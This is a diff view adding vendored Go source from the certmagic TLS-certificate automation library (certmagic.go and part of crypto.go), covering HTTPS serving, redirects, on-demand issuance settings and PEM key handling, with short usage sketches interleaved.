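MatchWildcard("FOO.Example.COM", "*.example.com") // true: case-insensitive
MatchWildcard("a.b.example.com", "*.example.com") // false: would need to cover two labels
MatchWildcard("example.com", "*.example.com")     // false: the bare apex does not match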
|
506 vendor/github.com/caddyserver/certmagic/certmagic.go (generated, vendored, new file)
@@ -0,0 +1,506 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
// Package certmagic automates the obtaining and renewal of TLS certificates,
|
||||
// including TLS & HTTPS best practices such as robust OCSP stapling, caching,
|
||||
// HTTP->HTTPS redirects, and more.
|
||||
//
|
||||
// Its high-level API serves your HTTP handlers over HTTPS if you simply give
|
||||
// the domain name(s) and the http.Handler; CertMagic will create and run
|
||||
// the HTTPS server for you, fully managing certificates during the lifetime
|
||||
// of the server. Similarly, it can be used to start TLS listeners or return
|
||||
// a ready-to-use tls.Config -- whatever layer you need TLS for, CertMagic
|
||||
// makes it easy. See the HTTPS, Listen, and TLS functions for that.
|
||||
//
|
||||
// If you need more control, create a Cache using NewCache() and then make
|
||||
// a Config using New(). You can then call Manage() on the config. But if
|
||||
// you use this lower-level API, you'll have to be sure to solve the HTTP
|
||||
// and TLS-ALPN challenges yourself (unless you disabled them or use the
|
||||
// DNS challenge) by using the provided Config.GetCertificate function
|
||||
// in your tls.Config and/or Config.HTTPChallengeHandler in your HTTP
|
||||
// handler.
|
||||
//
|
||||
// See the package's README for more instruction.
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"fmt"
|
||||
"log"
|
||||
"net"
|
||||
"net/http"
|
||||
"sort"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
// HTTPS serves mux for all domainNames using the HTTP
|
||||
// and HTTPS ports, redirecting all HTTP requests to HTTPS.
|
||||
// It uses the Default config and a background context.
|
||||
//
|
||||
// This high-level convenience function is opinionated and
|
||||
// applies sane defaults for production use, including
|
||||
// timeouts for HTTP requests and responses. To allow very
|
||||
// long-lived connections, you should make your own
|
||||
// http.Server values and use this package's Listen(), TLS(),
|
||||
// or Config.TLSConfig() functions to customize to your needs.
|
||||
// For example, servers which need to support large uploads or
|
||||
// downloads with slow clients may need to use longer timeouts,
|
||||
// and this function is therefore not suitable for them.
|
||||
//
|
||||
// Calling this function signifies your acceptance to
|
||||
// the CA's Subscriber Agreement and/or Terms of Service.
|
||||
func HTTPS(domainNames []string, mux http.Handler) error {
|
||||
ctx := context.Background()
|
||||
|
||||
if mux == nil {
|
||||
mux = http.DefaultServeMux
|
||||
}
|
||||
|
||||
DefaultACME.Agreed = true
|
||||
cfg := NewDefault()
|
||||
|
||||
err := cfg.ManageSync(ctx, domainNames)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
httpWg.Add(1)
|
||||
defer httpWg.Done()
|
||||
|
||||
// if we haven't made listeners yet, do so now,
|
||||
// and clean them up when all servers are done
|
||||
lnMu.Lock()
|
||||
if httpLn == nil && httpsLn == nil {
|
||||
httpLn, err = net.Listen("tcp", fmt.Sprintf(":%d", HTTPPort))
|
||||
if err != nil {
|
||||
lnMu.Unlock()
|
||||
return err
|
||||
}
|
||||
|
||||
tlsConfig := cfg.TLSConfig()
|
||||
tlsConfig.NextProtos = append([]string{"h2", "http/1.1"}, tlsConfig.NextProtos...)
|
||||
|
||||
httpsLn, err = tls.Listen("tcp", fmt.Sprintf(":%d", HTTPSPort), tlsConfig)
|
||||
if err != nil {
|
||||
httpLn.Close()
|
||||
httpLn = nil
|
||||
lnMu.Unlock()
|
||||
return err
|
||||
}
|
||||
|
||||
go func() {
|
||||
httpWg.Wait()
|
||||
lnMu.Lock()
|
||||
httpLn.Close()
|
||||
httpsLn.Close()
|
||||
lnMu.Unlock()
|
||||
}()
|
||||
}
|
||||
hln, hsln := httpLn, httpsLn
|
||||
lnMu.Unlock()
|
||||
|
||||
// create HTTP/S servers that are configured
|
||||
// with sane default timeouts and appropriate
|
||||
// handlers (the HTTP server solves the HTTP
|
||||
// challenge and issues redirects to HTTPS,
|
||||
// while the HTTPS server simply serves the
|
||||
// user's handler)
|
||||
httpServer := &http.Server{
|
||||
ReadHeaderTimeout: 5 * time.Second,
|
||||
ReadTimeout: 5 * time.Second,
|
||||
WriteTimeout: 5 * time.Second,
|
||||
IdleTimeout: 5 * time.Second,
|
||||
BaseContext: func(listener net.Listener) context.Context { return ctx },
|
||||
}
|
||||
if len(cfg.Issuers) > 0 {
|
||||
if am, ok := cfg.Issuers[0].(*ACMEIssuer); ok {
|
||||
httpServer.Handler = am.HTTPChallengeHandler(http.HandlerFunc(httpRedirectHandler))
|
||||
}
|
||||
}
|
||||
httpsServer := &http.Server{
|
||||
ReadHeaderTimeout: 10 * time.Second,
|
||||
ReadTimeout: 30 * time.Second,
|
||||
WriteTimeout: 2 * time.Minute,
|
||||
IdleTimeout: 5 * time.Minute,
|
||||
Handler: mux,
|
||||
BaseContext: func(listener net.Listener) context.Context { return ctx },
|
||||
}
|
||||
|
||||
log.Printf("%v Serving HTTP->HTTPS on %s and %s",
|
||||
domainNames, hln.Addr(), hsln.Addr())
|
||||
|
||||
go httpServer.Serve(hln)
|
||||
return httpsServer.Serve(hsln)
|
||||
}
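
A minimal end-to-end sketch of the high-level API described above; example.com is a placeholder domain and the call blocks while serving.

package main

import (
	"net/http"

	"github.com/caddyserver/certmagic"
)

func main() {
	mux := http.NewServeMux()
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		w.Write([]byte("hello over HTTPS"))
	})
	// Certificates are obtained, renewed, and served automatically;
	// plain HTTP requests are redirected to HTTPS.
	if err := certmagic.HTTPS([]string{"example.com"}, mux); err != nil {
		panic(err)
	}
}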
|
||||
|
||||
func httpRedirectHandler(w http.ResponseWriter, r *http.Request) {
|
||||
toURL := "https://"
|
||||
|
||||
// since we redirect to the standard HTTPS port, we
|
||||
// do not need to include it in the redirect URL
|
||||
requestHost := hostOnly(r.Host)
|
||||
|
||||
toURL += requestHost
|
||||
toURL += r.URL.RequestURI()
|
||||
|
||||
// get rid of this disgusting unencrypted HTTP connection 🤢
|
||||
w.Header().Set("Connection", "close")
|
||||
|
||||
http.Redirect(w, r, toURL, http.StatusMovedPermanently)
|
||||
}
|
||||
|
||||
// TLS enables management of certificates for domainNames
|
||||
// and returns a valid tls.Config. It uses the Default
|
||||
// config.
|
||||
//
|
||||
// Because this is a convenience function that returns
|
||||
// only a tls.Config, it does not assume HTTP is being
|
||||
// served on the HTTP port, so the HTTP challenge is
|
||||
// disabled (no HTTPChallengeHandler is necessary). The
|
||||
// package variable Default is modified so that the
|
||||
// HTTP challenge is disabled.
|
||||
//
|
||||
// Calling this function signifies your acceptance to
|
||||
// the CA's Subscriber Agreement and/or Terms of Service.
|
||||
func TLS(domainNames []string) (*tls.Config, error) {
|
||||
DefaultACME.Agreed = true
|
||||
DefaultACME.DisableHTTPChallenge = true
|
||||
cfg := NewDefault()
|
||||
return cfg.TLSConfig(), cfg.ManageSync(context.Background(), domainNames)
|
||||
}
|
||||
|
||||
// Listen manages certificates for domainName and returns a
|
||||
// TLS listener. It uses the Default config.
|
||||
//
|
||||
// Because this convenience function returns only a TLS-enabled
|
||||
// listener and does not presume HTTP is also being served,
|
||||
// the HTTP challenge will be disabled. The package variable
|
||||
// Default is modified so that the HTTP challenge is disabled.
|
||||
//
|
||||
// Calling this function signifies your acceptance to
|
||||
// the CA's Subscriber Agreement and/or Terms of Service.
|
||||
func Listen(domainNames []string) (net.Listener, error) {
|
||||
DefaultACME.Agreed = true
|
||||
DefaultACME.DisableHTTPChallenge = true
|
||||
cfg := NewDefault()
|
||||
err := cfg.ManageSync(context.Background(), domainNames)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return tls.Listen("tcp", fmt.Sprintf(":%d", HTTPSPort), cfg.TLSConfig())
|
||||
}
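
And a sketch of the listener-level variant, for callers that want to run their own http.Server; the domain is again a placeholder.

ln, err := certmagic.Listen([]string{"example.com"})
if err != nil {
	log.Fatal(err)
}
log.Fatal(http.Serve(ln, handler)) // handler is any http.Handler you supply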
|
||||
|
||||
// ManageSync obtains certificates for domainNames and keeps them
|
||||
// renewed using the Default config.
|
||||
//
|
||||
// This is a slightly lower-level function; you will need to
|
||||
// wire up support for the ACME challenges yourself. You can
|
||||
// obtain a Config to help you do that by calling NewDefault().
|
||||
//
|
||||
// You will need to ensure that you use a TLS config that gets
|
||||
// certificates from this Config and that the HTTP and TLS-ALPN
|
||||
// challenges can be solved. The easiest way to do this is to
|
||||
// use NewDefault().TLSConfig() as your TLS config and to wrap
|
||||
// your HTTP handler with NewDefault().HTTPChallengeHandler().
|
||||
// If you don't have an HTTP server, you will need to disable
|
||||
// the HTTP challenge.
|
||||
//
|
||||
// If you already have a TLS config you want to use, you can
|
||||
// simply set its GetCertificate field to
|
||||
// NewDefault().GetCertificate.
|
||||
//
|
||||
// Calling this function signifies your acceptance to
|
||||
// the CA's Subscriber Agreement and/or Terms of Service.
|
||||
func ManageSync(ctx context.Context, domainNames []string) error {
|
||||
DefaultACME.Agreed = true
|
||||
return NewDefault().ManageSync(ctx, domainNames)
|
||||
}
|
||||
|
||||
// ManageAsync is the same as ManageSync, except that
|
||||
// certificates are managed asynchronously. This means
|
||||
// that the function will return before certificates
|
||||
// are ready, and errors that occur during certificate
|
||||
// obtain or renew operations are only logged. It is
|
||||
// vital that you monitor the logs if using this method,
|
||||
// which is only recommended for automated/non-interactive
|
||||
// environments.
|
||||
func ManageAsync(ctx context.Context, domainNames []string) error {
|
||||
DefaultACME.Agreed = true
|
||||
return NewDefault().ManageAsync(ctx, domainNames)
|
||||
}
|
||||
|
||||
// OnDemandConfig configures on-demand TLS (certificate
|
||||
// operations as-needed, like during TLS handshakes,
|
||||
// rather than immediately).
|
||||
//
|
||||
// When this package's high-level convenience functions
|
||||
// are used (HTTPS, Manage, etc., where the Default
|
||||
// config is used as a template), this struct regulates
|
||||
// certificate operations using an implicit whitelist
|
||||
// containing the names passed into those functions if
|
||||
// no DecisionFunc is set. This ensures some degree of
|
||||
// control by default to avoid certificate operations for
|
||||
// arbitrary domain names. To override this whitelist,
|
||||
// manually specify a DecisionFunc. To impose rate limits,
|
||||
// specify your own DecisionFunc.
|
||||
type OnDemandConfig struct {
|
||||
// If set, this function will be called to determine
|
||||
// whether a certificate can be obtained or renewed
|
||||
// for the given name. If an error is returned, the
|
||||
// request will be denied.
|
||||
DecisionFunc func(name string) error
|
||||
|
||||
// List of whitelisted hostnames (SNI values) for
|
||||
// deferred (on-demand) obtaining of certificates.
|
||||
// Used only by higher-level functions in this
|
||||
// package to persist the list of hostnames that
|
||||
// the config is supposed to manage. This is done
|
||||
// because it seems reasonable that if you say
|
||||
// "Manage [domain names...]", then only those
|
||||
// domain names should be able to have certs;
|
||||
// we don't NEED this feature, but it makes sense
|
||||
// for higher-level convenience functions to be
|
||||
// able to retain their convenience (alternative
|
||||
// is: the user manually creates a DecisionFunc
|
||||
// that whitelists the same names it already
|
||||
// passed into Manage) and without letting clients
|
||||
// have their run of any domain names they want.
|
||||
// Only enforced if len > 0.
|
||||
hostWhitelist []string
|
||||
}
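
A sketch of restricting on-demand issuance with a DecisionFunc; it assumes the Config type exposes this struct through an OnDemand field, as elsewhere in the package.

magic := NewDefault()
magic.OnDemand = &OnDemandConfig{
	DecisionFunc: func(name string) error {
		if name != "allowed.example.com" { // placeholder allow-list
			return fmt.Errorf("not allowing certificate for %s", name)
		}
		return nil
	},
}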
|
||||
|
||||
func (o *OnDemandConfig) whitelistContains(name string) bool {
|
||||
for _, n := range o.hostWhitelist {
|
||||
if strings.EqualFold(n, name) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// isLoopback returns true if the hostname of addr looks
|
||||
// explicitly like a common local hostname. addr must only
|
||||
// be a host or a host:port combination.
|
||||
func isLoopback(addr string) bool {
|
||||
host := hostOnly(addr)
|
||||
return host == "localhost" ||
|
||||
strings.Trim(host, "[]") == "::1" ||
|
||||
strings.HasPrefix(host, "127.")
|
||||
}
|
||||
|
||||
// isInternal returns true if the IP of addr
|
||||
// belongs to a private network IP range. addr
|
||||
// must only be an IP or an IP:port combination.
|
||||
// Loopback addresses are considered false.
|
||||
func isInternal(addr string) bool {
|
||||
privateNetworks := []string{
|
||||
"10.0.0.0/8",
|
||||
"172.16.0.0/12",
|
||||
"192.168.0.0/16",
|
||||
"fc00::/7",
|
||||
}
|
||||
host := hostOnly(addr)
|
||||
ip := net.ParseIP(host)
|
||||
if ip == nil {
|
||||
return false
|
||||
}
|
||||
for _, privateNetwork := range privateNetworks {
|
||||
_, ipnet, _ := net.ParseCIDR(privateNetwork)
|
||||
if ipnet.Contains(ip) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// hostOnly returns only the host portion of hostport.
|
||||
// If there is no port or if there is an error splitting
|
||||
// the port off, the whole input string is returned.
|
||||
func hostOnly(hostport string) string {
|
||||
host, _, err := net.SplitHostPort(hostport)
|
||||
if err != nil {
|
||||
return hostport // OK; probably had no port to begin with
|
||||
}
|
||||
return host
|
||||
}
|
||||
|
||||
// PreChecker is an interface that can be optionally implemented by
|
||||
// Issuers. Pre-checks are performed before each call (or batch of
|
||||
// identical calls) to Issue(), giving the issuer the option to ensure
|
||||
// it has all the necessary information/state.
|
||||
type PreChecker interface {
|
||||
PreCheck(ctx context.Context, names []string, interactive bool) error
|
||||
}
|
||||
|
||||
// Issuer is a type that can issue certificates.
|
||||
type Issuer interface {
|
||||
// Issue obtains a certificate for the given CSR. It
|
||||
// must honor context cancellation if it is long-running.
|
||||
// It can also use the context to find out if the current
|
||||
// call is part of a retry, via AttemptsCtxKey.
|
||||
Issue(ctx context.Context, request *x509.CertificateRequest) (*IssuedCertificate, error)
|
||||
|
||||
// IssuerKey must return a string that uniquely identifies
|
||||
// this particular configuration of the Issuer such that
|
||||
// any certificates obtained by this Issuer will be treated
|
||||
// as identical if they have the same SANs.
|
||||
//
|
||||
// Certificates obtained from Issuers with the same IssuerKey
|
||||
// will overwrite others with the same SANs. For example, an
|
||||
// Issuer might be able to obtain certificates from different
|
||||
// CAs, say A and B. It is likely that the CAs have different
|
||||
// use cases and purposes (e.g. testing and production), so
|
||||
// their respective certificates should not overwrite each
|
||||
// other.
|
||||
IssuerKey() string
|
||||
}
|
||||
|
||||
// Revoker can revoke certificates. Reason codes are defined
|
||||
// by RFC 5280 §5.3.1: https://tools.ietf.org/html/rfc5280#section-5.3.1
|
||||
// and are available as constants in our ACME library.
|
||||
type Revoker interface {
|
||||
Revoke(ctx context.Context, cert CertificateResource, reason int) error
|
||||
}
|
||||
|
||||
// Manager is a type that manages certificates (keeps them renewed) such
|
||||
// that we can get certificates during TLS handshakes to immediately serve
|
||||
// to clients.
|
||||
//
|
||||
// TODO: This is an EXPERIMENTAL API. It is subject to change/removal.
|
||||
type Manager interface {
|
||||
// GetCertificate returns the certificate to use to complete the handshake.
|
||||
// Since this is called during every TLS handshake, it must be very fast and not block.
|
||||
// Returning (nil, nil) is valid and is simply treated as a no-op.
|
||||
GetCertificate(context.Context, *tls.ClientHelloInfo) (*tls.Certificate, error)
|
||||
}
|
||||
|
||||
// KeyGenerator can generate a private key.
|
||||
type KeyGenerator interface {
|
||||
// GenerateKey generates a private key. The returned
|
||||
// PrivateKey must be able to expose its associated
|
||||
// public key.
|
||||
GenerateKey() (crypto.PrivateKey, error)
|
||||
}
|
||||
|
||||
// IssuedCertificate represents a certificate that was just issued.
|
||||
type IssuedCertificate struct {
|
||||
// The PEM-encoding of DER-encoded ASN.1 data.
|
||||
Certificate []byte
|
||||
|
||||
// Any extra information to serialize alongside the
|
||||
// certificate in storage.
|
||||
Metadata interface{}
|
||||
}
|
||||
|
||||
// CertificateResource associates a certificate with its private
|
||||
// key and other useful information, for use in maintaining the
|
||||
// certificate.
|
||||
type CertificateResource struct {
|
||||
// The list of names on the certificate;
|
||||
// for convenience only.
|
||||
SANs []string `json:"sans,omitempty"`
|
||||
|
||||
// The PEM-encoding of DER-encoded ASN.1 data
|
||||
// for the cert or chain.
|
||||
CertificatePEM []byte `json:"-"`
|
||||
|
||||
// The PEM-encoding of the certificate's private key.
|
||||
PrivateKeyPEM []byte `json:"-"`
|
||||
|
||||
// Any extra information associated with the certificate,
|
||||
// usually provided by the issuer implementation.
|
||||
IssuerData interface{} `json:"issuer_data,omitempty"`
|
||||
|
||||
// The unique string identifying the issuer of the
|
||||
// certificate; internally useful for storage access.
|
||||
issuerKey string `json:"-"`
|
||||
}
|
||||
|
||||
// NamesKey returns the list of SANs as a single string,
|
||||
// truncated to some ridiculously long size limit. It
|
||||
// can act as a key for the set of names on the resource.
|
||||
func (cr *CertificateResource) NamesKey() string {
|
||||
sort.Strings(cr.SANs)
|
||||
result := strings.Join(cr.SANs, ",")
|
||||
if len(result) > 1024 {
|
||||
const trunc = "_trunc"
|
||||
result = result[:1024-len(trunc)] + trunc
|
||||
}
|
||||
return result
|
||||
}
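
For example, with values chosen purely for illustration:

cr := &CertificateResource{SANs: []string{"b.example.com", "a.example.com"}}
_ = cr.NamesKey() // "a.example.com,b.example.com" (sorted, comma-joined)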
|
||||
|
||||
// Default contains the package defaults for the
|
||||
// various Config fields. This is used as a template
|
||||
// when creating your own Configs with New() or
|
||||
// NewDefault(), and it is also used as the Config
|
||||
// by all the high-level functions in this package
|
||||
// that abstract away most configuration (HTTPS(),
|
||||
// TLS(), Listen(), etc).
|
||||
//
|
||||
// The fields of this value will be used for Config
|
||||
// fields which are unset. Feel free to modify these
|
||||
// defaults, but do not use this Config by itself: it
|
||||
// is only a template. Valid configurations can be
|
||||
// obtained by calling New() (if you have your own
|
||||
// certificate cache) or NewDefault() (if you only
|
||||
// need a single config and want to use the default
|
||||
// cache).
|
||||
//
|
||||
// Even if the Issuers or Storage fields are not set,
|
||||
// defaults will be applied in the call to New().
|
||||
var Default = Config{
|
||||
RenewalWindowRatio: DefaultRenewalWindowRatio,
|
||||
Storage: defaultFileStorage,
|
||||
KeySource: DefaultKeyGenerator,
|
||||
}
|
||||
|
||||
const (
|
||||
// HTTPChallengePort is the officially-designated port for
|
||||
// the HTTP challenge according to the ACME spec.
|
||||
HTTPChallengePort = 80
|
||||
|
||||
// TLSALPNChallengePort is the officially-designated port for
|
||||
// the TLS-ALPN challenge according to the ACME spec.
|
||||
TLSALPNChallengePort = 443
|
||||
)
|
||||
|
||||
// Port variables must remain their defaults unless you
|
||||
// forward packets from the defaults to whatever these
|
||||
// are set to; otherwise ACME challenges will fail.
|
||||
var (
|
||||
// HTTPPort is the port on which to serve HTTP
|
||||
// and, as such, the HTTP challenge (unless
|
||||
// Default.AltHTTPPort is set).
|
||||
HTTPPort = 80
|
||||
|
||||
// HTTPSPort is the port on which to serve HTTPS
|
||||
// and, as such, the TLS-ALPN challenge
|
||||
// (unless Default.AltTLSALPNPort is set).
|
||||
HTTPSPort = 443
|
||||
)
|
||||
|
||||
// Variables for conveniently serving HTTPS.
|
||||
var (
|
||||
httpLn, httpsLn net.Listener
|
||||
lnMu sync.Mutex
|
||||
httpWg sync.WaitGroup
|
||||
)
|
||||
|
||||
// Maximum size for the stack trace when recovering from panics.
|
||||
const stackTraceBufferSize = 1024 * 128
|
1136 vendor/github.com/caddyserver/certmagic/config.go (generated, vendored, new file)
File diff suppressed because it is too large.
368 vendor/github.com/caddyserver/certmagic/crypto.go (generated, vendored, new file)
@@ -0,0 +1,368 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto"
|
||||
"crypto/ecdsa"
|
||||
"crypto/ed25519"
|
||||
"crypto/elliptic"
|
||||
"crypto/rand"
|
||||
"crypto/rsa"
|
||||
"crypto/sha256"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"encoding/json"
|
||||
"encoding/pem"
|
||||
"errors"
|
||||
"fmt"
|
||||
"hash/fnv"
|
||||
"io/fs"
|
||||
"sort"
|
||||
"strings"
|
||||
|
||||
"github.com/klauspost/cpuid/v2"
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/net/idna"
|
||||
)
|
||||
|
||||
// PEMEncodePrivateKey marshals a private key into a PEM-encoded block.
|
||||
// The private key must be one of *ecdsa.PrivateKey, *rsa.PrivateKey, or
|
||||
// *ed25519.PrivateKey.
|
||||
func PEMEncodePrivateKey(key crypto.PrivateKey) ([]byte, error) {
|
||||
var pemType string
|
||||
var keyBytes []byte
|
||||
switch key := key.(type) {
|
||||
case *ecdsa.PrivateKey:
|
||||
var err error
|
||||
pemType = "EC"
|
||||
keyBytes, err = x509.MarshalECPrivateKey(key)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
case *rsa.PrivateKey:
|
||||
pemType = "RSA"
|
||||
keyBytes = x509.MarshalPKCS1PrivateKey(key)
|
||||
case ed25519.PrivateKey:
|
||||
var err error
|
||||
pemType = "ED25519"
|
||||
keyBytes, err = x509.MarshalPKCS8PrivateKey(key)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported key type: %T", key)
|
||||
}
|
||||
pemKey := pem.Block{Type: pemType + " PRIVATE KEY", Bytes: keyBytes}
|
||||
return pem.EncodeToMemory(&pemKey), nil
|
||||
}
|
||||
|
||||
// PEMDecodePrivateKey loads a PEM-encoded ECC/RSA private key from an array of bytes.
|
||||
// Borrowed from Go standard library, to handle various private key and PEM block types.
|
||||
func PEMDecodePrivateKey(keyPEMBytes []byte) (crypto.Signer, error) {
|
||||
// Modified from original:
|
||||
// https://github.com/golang/go/blob/693748e9fa385f1e2c3b91ca9acbb6c0ad2d133d/src/crypto/tls/tls.go#L291-L308
|
||||
// https://github.com/golang/go/blob/693748e9fa385f1e2c3b91ca9acbb6c0ad2d133d/src/crypto/tls/tls.go#L238
|
||||
|
||||
keyBlockDER, _ := pem.Decode(keyPEMBytes)
|
||||
|
||||
if keyBlockDER == nil {
|
||||
return nil, fmt.Errorf("failed to decode PEM block containing private key")
|
||||
}
|
||||
|
||||
if keyBlockDER.Type != "PRIVATE KEY" && !strings.HasSuffix(keyBlockDER.Type, " PRIVATE KEY") {
|
||||
return nil, fmt.Errorf("unknown PEM header %q", keyBlockDER.Type)
|
||||
}
|
||||
|
||||
if key, err := x509.ParsePKCS1PrivateKey(keyBlockDER.Bytes); err == nil {
|
||||
return key, nil
|
||||
}
|
||||
|
||||
if key, err := x509.ParsePKCS8PrivateKey(keyBlockDER.Bytes); err == nil {
|
||||
switch key := key.(type) {
|
||||
case *rsa.PrivateKey, *ecdsa.PrivateKey, ed25519.PrivateKey:
|
||||
return key.(crypto.Signer), nil
|
||||
default:
|
||||
return nil, fmt.Errorf("found unknown private key type in PKCS#8 wrapping: %T", key)
|
||||
}
|
||||
}
|
||||
|
||||
if key, err := x509.ParseECPrivateKey(keyBlockDER.Bytes); err == nil {
|
||||
return key, nil
|
||||
}
|
||||
|
||||
return nil, fmt.Errorf("unknown private key type")
|
||||
}
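
A round-trip sketch for the two helpers above, using an ECDSA key:

key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
if err != nil {
	log.Fatal(err)
}
pemBytes, err := PEMEncodePrivateKey(key) // emits an "EC PRIVATE KEY" block
if err != nil {
	log.Fatal(err)
}
signer, err := PEMDecodePrivateKey(pemBytes)
if err != nil {
	log.Fatal(err)
}
_ = signer // a crypto.Signer holding an equivalent *ecdsa.PrivateKey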
|
||||
|
||||
// parseCertsFromPEMBundle parses a certificate bundle from top to bottom and returns
|
||||
// a slice of x509 certificates. This function will error if no certificates are found.
|
||||
func parseCertsFromPEMBundle(bundle []byte) ([]*x509.Certificate, error) {
|
||||
var certificates []*x509.Certificate
|
||||
var certDERBlock *pem.Block
|
||||
for {
|
||||
certDERBlock, bundle = pem.Decode(bundle)
|
||||
if certDERBlock == nil {
|
||||
break
|
||||
}
|
||||
if certDERBlock.Type == "CERTIFICATE" {
|
||||
cert, err := x509.ParseCertificate(certDERBlock.Bytes)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
certificates = append(certificates, cert)
|
||||
}
|
||||
}
|
||||
if len(certificates) == 0 {
|
||||
return nil, fmt.Errorf("no certificates found in bundle")
|
||||
}
|
||||
return certificates, nil
|
||||
}
|
||||
|
||||
// fastHash hashes input using a hashing algorithm that
|
||||
// is fast, and returns the hash as a hex-encoded string.
|
||||
// Do not use this for cryptographic purposes.
|
||||
func fastHash(input []byte) string {
|
||||
h := fnv.New32a()
|
||||
h.Write(input)
|
||||
return fmt.Sprintf("%x", h.Sum32())
|
||||
}
|
||||
|
||||
// saveCertResource saves the certificate resource to disk. This
|
||||
// includes the certificate file itself, the private key, and the
|
||||
// metadata file.
|
||||
func (cfg *Config) saveCertResource(ctx context.Context, issuer Issuer, cert CertificateResource) error {
|
||||
metaBytes, err := json.MarshalIndent(cert, "", "\t")
|
||||
if err != nil {
|
||||
return fmt.Errorf("encoding certificate metadata: %v", err)
|
||||
}
|
||||
|
||||
issuerKey := issuer.IssuerKey()
|
||||
certKey := cert.NamesKey()
|
||||
|
||||
all := []keyValue{
|
||||
{
|
||||
key: StorageKeys.SitePrivateKey(issuerKey, certKey),
|
||||
value: cert.PrivateKeyPEM,
|
||||
},
|
||||
{
|
||||
key: StorageKeys.SiteCert(issuerKey, certKey),
|
||||
value: cert.CertificatePEM,
|
||||
},
|
||||
{
|
||||
key: StorageKeys.SiteMeta(issuerKey, certKey),
|
||||
value: metaBytes,
|
||||
},
|
||||
}
|
||||
|
||||
return storeTx(ctx, cfg.Storage, all)
|
||||
}
|
||||
|
||||
// loadCertResourceAnyIssuer loads and returns the certificate resource from any
|
||||
// of the configured issuers. If multiple are found (e.g. if there are 3 issuers
|
||||
// configured, and all 3 have a resource matching certNamesKey), then the newest
|
||||
// (latest NotBefore date) resource will be chosen.
|
||||
func (cfg *Config) loadCertResourceAnyIssuer(ctx context.Context, certNamesKey string) (CertificateResource, error) {
|
||||
// we can save some extra decoding steps if there's only one issuer, since
|
||||
// we don't need to compare potentially multiple available resources to
|
||||
// select the best one, when there's only one choice anyway
|
||||
if len(cfg.Issuers) == 1 {
|
||||
return cfg.loadCertResource(ctx, cfg.Issuers[0], certNamesKey)
|
||||
}
|
||||
|
||||
type decodedCertResource struct {
|
||||
CertificateResource
|
||||
issuer Issuer
|
||||
decoded *x509.Certificate
|
||||
}
|
||||
var certResources []decodedCertResource
|
||||
var lastErr error
|
||||
|
||||
// load and decode all certificate resources found with the
|
||||
// configured issuers so we can sort by newest
|
||||
for _, issuer := range cfg.Issuers {
|
||||
certRes, err := cfg.loadCertResource(ctx, issuer, certNamesKey)
|
||||
if err != nil {
|
||||
if errors.Is(err, fs.ErrNotExist) {
|
||||
// not a problem, but we need to remember the error
|
||||
// in case we end up not finding any cert resources
|
||||
// since we'll need an error to return in that case
|
||||
lastErr = err
|
||||
continue
|
||||
}
|
||||
return CertificateResource{}, err
|
||||
}
|
||||
certs, err := parseCertsFromPEMBundle(certRes.CertificatePEM)
|
||||
if err != nil {
|
||||
return CertificateResource{}, err
|
||||
}
|
||||
certResources = append(certResources, decodedCertResource{
|
||||
CertificateResource: certRes,
|
||||
issuer: issuer,
|
||||
decoded: certs[0],
|
||||
})
|
||||
}
|
||||
if len(certResources) == 0 {
|
||||
if lastErr == nil {
|
||||
lastErr = fmt.Errorf("no certificate resources found") // just in case; e.g. no Issuers configured
|
||||
}
|
||||
return CertificateResource{}, lastErr
|
||||
}
|
||||
|
||||
// sort by date so the most recently issued comes first
|
||||
sort.Slice(certResources, func(i, j int) bool {
|
||||
return certResources[j].decoded.NotBefore.Before(certResources[i].decoded.NotBefore)
|
||||
})
|
||||
|
||||
if cfg.Logger != nil {
|
||||
cfg.Logger.Debug("loading managed certificate",
|
||||
zap.String("domain", certNamesKey),
|
||||
zap.Time("expiration", certResources[0].decoded.NotAfter),
|
||||
zap.String("issuer_key", certResources[0].issuer.IssuerKey()),
|
||||
zap.Any("storage", cfg.Storage),
|
||||
)
|
||||
}
|
||||
|
||||
return certResources[0].CertificateResource, nil
|
||||
}
|
||||
|
||||
// loadCertResource loads a certificate resource from the given issuer's storage location.
|
||||
func (cfg *Config) loadCertResource(ctx context.Context, issuer Issuer, certNamesKey string) (CertificateResource, error) {
|
||||
certRes := CertificateResource{issuerKey: issuer.IssuerKey()}
|
||||
|
||||
normalizedName, err := idna.ToASCII(certNamesKey)
|
||||
if err != nil {
|
||||
return CertificateResource{}, fmt.Errorf("converting '%s' to ASCII: %v", certNamesKey, err)
|
||||
